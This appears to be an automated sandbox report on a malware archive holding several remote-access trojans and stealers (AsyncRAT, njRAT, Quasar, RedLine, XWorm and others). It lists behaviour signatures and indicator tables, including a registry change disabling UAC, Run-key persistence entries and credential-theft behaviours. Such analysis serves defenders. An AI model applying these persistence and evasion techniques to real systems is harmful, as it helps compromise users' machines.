Malware Analysis Report

2025-03-15 08:28

Sample ID 250213-e1kk6atmaz
Target Downloaders.zip
SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Tags
asyncrat gurcu njrat quasar redline systembc xworm beyond default hacked by here newoffice office04 tg@cvv88888 adware bootkit microsoft collection defense_evasion discovery execution infostealer persistence phishing privilege_escalation ransomware rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Threat Level: Known bad

The file Downloaders.zip was found to be: Known bad.

Malicious Activity Summary

asyncrat gurcu njrat quasar redline systembc xworm beyond default hacked by here newoffice office04 tg@cvv88888 adware bootkit microsoft collection defense_evasion discovery execution infostealer persistence phishing privilege_escalation ransomware rat spyware stealer trojan upx

Detect Xworm Payload

Gurcu, WhiteSnake

Xworm

Quasar payload

Quasar family

RedLine

njRAT/Bladabindi

RedLine payload

AsyncRat

Njrat family

Suspicious use of NtCreateUserProcessOtherParentProcess

SystemBC

Asyncrat family

Gurcu family

Suspicious use of NtCreateProcessExOtherParentProcess

Systembc family

Quasar RAT

UAC bypass

Xworm family

Redline family

Async RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets service image path in registry

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Boot or Logon Autostart Execution: Active Setup

Disables Task Manager via registry modification

Modifies Windows Firewall

Drops file in Drivers directory

Reads user/profile data of local email clients

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Identifies Wine through registry keys

Executes dropped EXE

Indicator Removal: Clear Windows Event Logs

Reads WinSCP keys stored on the system

Checks BIOS information in registry

Event Triggered Execution: Component Object Model Hijacking

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Writes to the Master Boot Record (MBR)

Checks installed software on the system

Adds Run key to start application

Enumerates connected drives

Installs/modifies Browser Helper Object

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Enumerates processes with tasklist

Drops autorun.inf file

Suspicious use of SetThreadContext

Detected potential entity reuse from brand MICROSOFT.

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Sets desktop wallpaper using registry

Drops file in Windows directory

Drops file in Program Files directory

System Network Configuration Discovery: Wi-Fi Discovery

Event Triggered Execution: Netsh Helper DLL

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Delays execution with timeout.exe

Suspicious use of UnmapMainImage

Checks processor information in registry

Modifies data under HKEY_USERS

outlook_office_path

Suspicious use of SendNotifyMessage

outlook_win_path

Runs ping.exe

Scheduled Task/Job: Scheduled Task

NTFS ADS

Modifies registry key

Enumerates system info in registry

Modifies registry class

System policy modification

Views/modifies file attributes

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Modifies system certificate store

Suspicious behavior: LoadsDriver

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Checks SCSI registry key(s)

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-13 04:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-13 04:24

Reported

2025-02-13 04:46

Platform

win11-20250211-en

Max time kernel

1152s

Max time network

1306s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 4872 created 5332 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\Files\TPB-1.exe

SystemBC

trojan systembc

Systembc family

systembc

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\Files\random.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\svc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\Drivers\PROCMON24.SYS C:\Program Files\ProcessMonitor\Procmon64.exe N/A
File opened for modification C:\Windows\system32\Drivers\PROCMON24.SYS C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
File created C:\Windows\system32\Drivers\PROCMON24.SYS C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
File opened for modification C:\Windows\system32\Drivers\PROCMON24.SYS C:\Program Files\sysint\Procmon64.exe N/A
File created C:\Windows\system32\Drivers\PROCMON24.SYS C:\Program Files\sysint\Procmon64.exe N/A
File opened for modification C:\Windows\system32\Drivers\PROCMON24.SYS C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
File created C:\Windows\system32\Drivers\PROCMON24.SYS C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
File opened for modification C:\Windows\system32\Drivers\PROCMON24.SYS C:\Program Files\ProcessMonitor\Procmon64.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" C:\Program Files\sysint\Procmon64.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\Desktop\Files\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk C:\Users\Admin\Desktop\Files\winlog32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUtil.vbs C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\Desktop\Files\XClient.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\XClient.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\built.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\key.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\contorax.exe N/A
N/A N/A C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Sentil.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Security.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Client-built.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77Security.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\srtware.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\$77Security.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Pichon.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\TCP.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\c3.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\winlog32.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\MajesticExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\$77Security.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\qNVQKFyM.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\svc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\$77Security.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Wine C:\Users\Admin\Desktop\Files\random.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "\"C:\\Users\\Admin\\AppData\\Roaming\\KDOT\\PerfWatson1.exe\"" C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe" C:\Users\Admin\AppData\Local\Temp\temp_16933.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\ProgramData\\adbabbcfdbc.exe\"" C:\Users\Admin\AppData\Local\Temp\temp_16943.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_16943.exe\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" C:\Users\Admin\Desktop\Files\networkmanager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" C:\Users\Admin\Desktop\Files\networkmanager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" C:\Users\Admin\Desktop\Files\networkmanager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe" C:\Users\Admin\AppData\Local\Temp\$77Security.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\ProgramData\\adbabbcfdbc.exe\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\Desktop\Files\XClient.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_16933.exe" C:\Users\Admin\AppData\Local\Temp\temp_16933.exe N/A

